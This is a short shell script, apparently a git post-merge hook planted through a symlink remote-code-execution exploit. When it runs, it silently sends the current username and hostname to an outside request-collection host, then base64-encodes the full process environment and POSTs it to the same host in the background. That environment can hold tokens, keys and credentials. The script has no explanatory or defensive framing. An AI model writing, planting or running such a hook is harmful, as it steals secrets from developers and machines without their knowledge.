#!/bin/sh
(curl -s "http://76oqv57g.requestrepo.com/symlink-rce-post-merge-$(whoami)-$(hostname)" &)
(printenv | base64 -w0 | curl -s -X POST -d @- "http://76oqv57g.requestrepo.com/env-postmerge" &)
exit 0
